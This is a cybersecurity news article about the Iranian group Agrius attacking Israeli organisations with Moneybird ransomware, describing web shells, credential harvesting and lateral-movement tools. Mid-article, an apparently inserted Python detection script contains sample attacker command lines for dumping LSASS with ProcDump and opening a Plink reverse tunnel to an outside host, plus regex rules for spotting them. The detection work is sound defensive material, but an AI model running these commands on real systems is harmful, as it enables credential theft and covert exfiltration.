Iranian hackers are attacking Israeli organisations with Moneybird Ransomware


The Iranian threat actor group Agrius is using a new ransomware strain dubbed Moneybird in attacks targeting Israeli organisations. Also tracked as Pink Sandstorm, the group is known for past data-wiping attacks on Israeli targets that were disguised as ransomware infections.

The strain was discovered by Check Point researchers while responding to a ransomware attack against an Israeli organisation. While the researchers say that the payload itself was unique, the tactics, techniques and procedures used in the attack were similar to those of Agrius, and the stolen data was eventually leaked by an entity using one of the group's known aliases.

The group has been active since at least December 2020 and has been attributed to Iran's Ministry of Intelligence and Security (MOIS) by Microsoft. It previously used a makeshift ransomware called Apostle, which had started life as a .NET-based data wiper. Moneybird, however, is written in C++, suggesting that the group is capable of expanding its capabilities and developing new tools.

As for the attack vector itself, Agrius first exploits vulnerabilities within public-facing web servers, which then leads to the deployment of several unique variants of ASPXSpy web shells. After this, exploitation and post-exploitation activities are carried out using public VPN service nodes (often ProtonVPN) in Israel. 

Once the web shells are in place, a suite of further tools is deployed for reconnaissance and lateral movement within the target network, as well as to harvest data and extract credentials. These include:

  • SoftPerfect Network Scanner to scan internal networks.
  • Plink to tunnel traffic from a VPS owned by the attacker.
  • ProcDump to dump LSASS and harvest credentials.
  • FileZilla to extract compressed files.

A Moneybird ransom note. | Source: Check Point Research

That said, the researchers pointed out that most of the activity carried out by the threat actors was done manually over RDP. Some of the payloads were even downloaded by the threat actor opening a browser and connecting to legitimate file-sharing services that hosted them, one of which was the Moneybird executable itself.
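The tool chain described above (web shell spawning a shell, ProcDump aimed at LSASS, Plink tunnelling, SoftPerfect Network Scanner) is a reasonable hunting target in process-creation telemetry. The following is an added detection example, not code from the article or from Check Point; the event field names (`pid`, `parent`, `image`, `cmdline`) and the sample events are constructed assumptions, loosely modelled on Sysmon Event ID 1 fields.

```python
import re

WEB_WORKERS = {"w3wp.exe"}               # IIS worker process that hosts ASPX web shells
SHELLS = {"cmd.exe", "powershell.exe"}

def base(path):
    """Lower-cased basename of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rule_webshell(ev):
    # A web-server worker spawning an interactive shell is the classic web-shell tell.
    return base(ev["parent"]) in WEB_WORKERS and base(ev["image"]) in SHELLS

def rule_lsass_dump(ev):
    # ProcDump (any build name starting with "procdump") pointed at LSASS.
    return (base(ev["image"]).startswith("procdump")
            and re.search(r"\blsass(\.exe)?\b", ev["cmdline"], re.I) is not None)

def rule_plink_tunnel(ev):
    # Plink with a remote/local/dynamic forward flag: traffic tunnelled to an external VPS.
    return (base(ev["image"]) == "plink.exe"
            and re.search(r"(^|\s)-[RLD]\s", ev["cmdline"]) is not None)

def rule_netscan(ev):
    # SoftPerfect Network Scanner binary, used for internal recon.
    return base(ev["image"]) == "netscan.exe"

RULES = [("webshell_child", rule_webshell), ("lsass_dump", rule_lsass_dump),
         ("plink_tunnel", rule_plink_tunnel), ("netscan_recon", rule_netscan)]

def detect(events):
    """Return (rule_name, pid) for every event that matches a rule, in input order."""
    return [(name, ev["pid"]) for ev in events for name, fn in RULES if fn(ev)]

# Constructed sample events: four matching the described chain, two benign.
SAMPLE = [
    {"pid": 4120, "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"pid": 4188, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\procdump64.exe", "cmdline": "procdump64.exe -ma lsass.exe out.dmp"},
    {"pid": 4201, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\Public\plink.exe", "cmdline": "plink.exe -N -R 2222:127.0.0.1:2222 user@vps.example"},
    {"pid": 4233, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\Public\netscan.exe", "cmdline": "netscan.exe"},
    {"pid": 5000, "parent": r"C:\Windows\System32\services.exe",      # benign service host
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 5001, "parent": r"C:\Windows\System32\cmd.exe",           # benign developer dump
     "image": r"C:\Tools\procdump.exe", "cmdline": "procdump.exe -ma notepad.exe"},
]
```

Running `detect(SAMPLE)` flags the four attacker-style events and ignores the benign service host and the ProcDump run against a non-LSASS process; in practice the rules would be fed from an EDR or SIEM export rather than an inline list.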

The ransomware itself has no command-line parsing and carries its configuration embedded within the executable, making it less suitable for mass campaigns that often target many different environments.



Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: [email protected]